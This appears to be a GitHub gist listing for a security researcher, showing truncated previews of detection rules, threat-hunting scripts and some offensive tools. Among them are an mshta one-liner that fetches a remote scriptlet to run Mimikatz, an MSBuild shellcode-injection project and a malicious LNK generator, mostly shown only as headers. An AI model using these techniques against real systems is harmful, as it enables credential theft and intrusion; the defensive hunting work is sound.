vector-sec’s gists

vector-sec / detection.yml

Created May 31, 2022 16:51 — forked from kevthehermit/detection.yml

Office --> MSDT --> RCE

	title: Sysmon Office MSDT
	id: c95ed569-5da4-48b3-9698-5e429964556c
	description: Detects MSDT Exploit Attempts
	status: experimental
	author: kevthehermit
	date: 2022/05/30
	references:
	- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
	- https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
	logsource:

vector-sec / binary_analysis_hunting.py

Created July 2, 2021 18:27 — forked from rc-abodkins/binary_analysis_hunting.py

This script searches binaries within VMware Carbon Black EDR

	import argparse
	import os
	import configparser
	import csv
	import sys
	from os.path import exists
	import requests

	#Console Output coloring. Makes knowing if you have any errors/ warnings easier to identify
	err_Col = '\033[91m'

vector-sec / gist:0f0e23961ed5eddfce60a9559683ea54

Created July 12, 2018 20:36

	### Keybase proof

	I hereby claim:

	* I am vector-sec on github.
	* I am vector_sec (https://keybase.io/vector_sec) on keybase.
	* I have a public key whose fingerprint is 45F7 FBFB 85BC 9C5D 26AF FA50 CDD7 1C71 4152 0611

	To claim this, I am signing this object:

vector-sec / mimikatz.sct

Created January 18, 2018 14:15

Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"

vector-sec / Get-Doppelgangers.ps1

Created January 1, 2018 21:04 — forked from dezhub/Get-Doppelgangers.ps1

	function Get-Doppelgangers
	{
	<#
	.SYNOPSIS

	Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'

	Author: Joe Desimone (@dez_)
	License: BSD 3-Clause

vector-sec / gist:9caa8e14b2adba7ab0c215a6bf856953

Created November 28, 2017 15:09

Carbon Black API - PowerShell Example - Find All FileMods By certutil.exe - Type 1 == PE Write.

	$APIKey = 'KEY'
	[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
	$url = "https://www.example.com/api/v1/process?q=process_name:certutil.exe"
	$hdrs = @{}
	$hdrs.Add("X-Auth-Token",$APIKey)
	$response = Invoke-RestMethod -Uri $url -Headers $hdrs


	for($i =0; $i -lt $response.total_results; $i++)
	{

vector-sec / msbuildQueueAPC.csproj

Created August 30, 2017 13:11

MSBuild => CSC.exe Shellcode Inject using QueueUserAPC

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<-- x86 -->
	<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
	<!- x64 -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask

vector-sec / Get-Token.ps1

Created August 10, 2017 17:51

PowerShell script to enumerate all Process and Thread tokens.

	function Get-Token
	{
	foreach($proc in (Get-Process))
	{
	if($proc.Id -ne 0 -and $proc.Id -ne 4)
	{
	try
	{
	$hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION
	}

vector-sec / Create-LNK.ps1

Created June 30, 2017 15:59 — forked from enigma0x3/Create-LNK.ps1

	function Create-LNKPayload{
	<#
	.SYNOPSIS

	Generates a malicous LNK file

	.PARAMETER LNKName

	Name of the LNK file you want to create.

vector-sec / Get-InjectedThread.ps1

Created May 10, 2017 15:38 — forked from jaredcatkinson/Get-InjectedThread.ps1

Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone

	function Get-InjectedThread
	{
	<#

	.SYNOPSIS

	Looks for threads that were created as a result of code injection.

	.DESCRIPTION

Eric vector-sec